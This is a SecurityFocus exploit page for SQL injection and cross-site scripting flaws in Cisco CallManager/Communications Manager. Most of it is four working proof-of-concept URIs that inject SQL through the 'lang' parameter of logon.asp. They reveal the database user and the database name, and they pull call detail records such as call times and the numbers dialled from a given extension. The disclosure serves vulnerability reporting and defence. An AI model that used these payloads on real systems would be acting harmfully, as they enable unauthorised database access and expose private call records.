Cisco CallManager/Communications Manager SQL Injection and Cross-Site Scripting Vulnerabilities

To exploit the cross-site scripting vulnerability, an attacker entices an unsuspecting victim to follow a malicious URI. The attacker can exploit the SQL-injection vulnerability through a browser.

The following proof-of-concept URIs are available for the SQL-injection vulnerability:

To display the logged-in database user:

https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+CURRENT_USER;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

To display the selected database:

https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+db_name();select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

To display the UNIX time when a call was made from extension 12345:

https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+convert(char(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPartyNumber+%3C%3E+''+and+callingPartyNumber='12345';select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='

To display the destination number for that call. Replace "1174900000" with the value from the previous query:

https://www.example.com/CCMUser/logon.asp?lang=en'+union+select+top+1+finalCalledPartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber='12345'+and+dateTimeOrigination=1174900000;select+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''='


 

Privacy Statement
Copyright 2010, SecurityFocus